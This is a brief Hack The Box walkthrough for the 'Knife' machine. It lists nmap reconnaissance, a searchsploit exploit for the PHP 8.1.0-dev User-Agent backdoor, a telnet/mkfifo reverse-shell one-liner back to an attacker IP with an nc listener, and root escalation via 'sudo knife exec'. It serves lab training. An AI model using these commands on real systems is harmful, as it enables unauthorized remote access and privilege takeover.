Knife - Hack The Box

Reconnaissance

  • Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.242

  • Whatweb
whatweb http://10.10.10.242/

Exploitation

  • PHP 8.1.0-dev User Agent RCE
searchsploit php 8.1.0-dev

searchsploit -m php/webapps/49933.py
python3 49933.py

  • Send reverse shell
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.16.7 9000 0<$TF | /bin/bash 1>$TF
nc -nlvp 9000

Post-exploitation

  • Check sudoers
sudo -l

  • Knife Sudoers
sudo knife exec -E 'exec "/bin/sh"'